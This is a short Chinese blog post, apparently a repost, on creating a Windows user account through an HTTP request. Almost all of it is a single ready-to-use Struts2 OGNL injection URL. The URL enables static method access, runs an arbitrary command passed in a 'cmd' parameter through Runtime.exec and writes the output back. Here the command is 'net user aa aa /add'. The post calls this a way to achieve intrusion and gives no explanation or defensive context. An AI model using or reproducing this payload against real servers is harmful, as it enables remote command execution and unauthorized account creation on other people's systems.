利用HTTP协议创建Windows用户-优快云博客

本文链接：https://blog.youkuaiyun.com/iteye_7084/article/details/82536357

本文介绍了如何通过HTTP请求在Windows系统中创建用户账号，详细解释了相关代码逻辑及应用场景。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

创建用户信息：
http://xxxx/login.jsp?redirectURL=%2Fcustomsbroker%2Flist_item.action&systemCode=MF&ucSessionId=53F0FF2D0316429848DA5704FE03D050&('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=net+user+aa+aa+%2Fadd

可以直接在windows系统创建用户，实现入侵

http://www.iteye.com/news/28053